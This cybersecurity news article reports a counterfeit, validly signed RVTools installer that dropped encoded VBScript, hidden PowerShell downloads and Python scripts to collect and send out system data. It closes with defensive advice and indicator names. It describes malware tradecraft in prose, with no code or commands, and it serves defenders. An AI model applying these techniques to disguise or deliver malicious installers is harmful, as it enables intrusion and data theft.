A ubiquitous tool among VMware administrators has been exploited by cyber criminals. They developed a counterfeit version of RVTools, a key utility for managing virtual infrastructure, cleverly disguising it with a legitimate digital certificate. This tactic allowed them to bypass Windows security alerts without detection.
Exploitation of Trusted Software
RVTools is integral in enterprise settings, providing IT teams with comprehensive insights into virtual environments. Its reputation and the high-level access it requires made it an ideal target for attackers. The perpetrators behind this fraudulent installer capitalized on the trust typically afforded to signed software within enterprise systems.
K7 Security Labs first identified the issue, revealing in reports shared with Cyber Security News that the rogue installer utilized a genuine code-signing certificate from Sectigo. This certificate was issued to an entity named Xiamen Lunwei Huage Network Co., Ltd., which appears to be a shell company.
Methodology of the Attack
The attack was executed in three stages. Initially, the installer concealed a script that performed a reconnaissance of the victim’s system, establishing a covert remote access channel that communicated every five minutes. The digital certificate was valid during the attack, allowing it to slip past Windows SmartScreen and other endpoint defenses unnoticed.
Although the certificate has been revoked, environments not enforcing real-time certificate checks remain vulnerable. Static signature validation would not have flagged the installer as suspicious, highlighting the need for robust security measures.
Consequences and Protective Measures
The installer employed a digitally signed MSI file and a standard End-User License Agreement to create a false sense of legitimacy. Administrators familiar with signed software and legal agreements were unlikely to question its authenticity, which the attackers exploited.
Upon execution, the installer ran a hidden VBScript from the MSI’s binary table, using encoding techniques to mask its true function. This script initiated a hidden PowerShell process that downloaded a malicious archive, blending harmful scripts with trusted applications to avoid detection.
The attack continued after a system reboot, deploying two Python scripts. The first, collector.py, gathered detailed system information, while the second, Pmanager.py, encrypted and transmitted this data to remote servers. These scripts were designed to persist through system reboots by creating registry entries and scheduled tasks with elevated privileges.
Security Recommendations
Organizations using VMware should ensure RVTools installers are sourced directly from the official site. Security teams should monitor for unexpected files like winp.zip in the AppData directory and unusual Python processes. Implementing real-time certificate revocation checks at execution is crucial for defense against such attacks.
Blocking outbound connections from administrative workstations to unrecognized IP addresses can further safeguard against these threats. Indicators of compromise include specific file hashes and names detailed in the IoC section, which should be used to enhance security monitoring and response strategies.
For more cybersecurity updates, follow us on Google News, LinkedIn, and X. Set Cyber Security News as a preferred source for instant alerts.
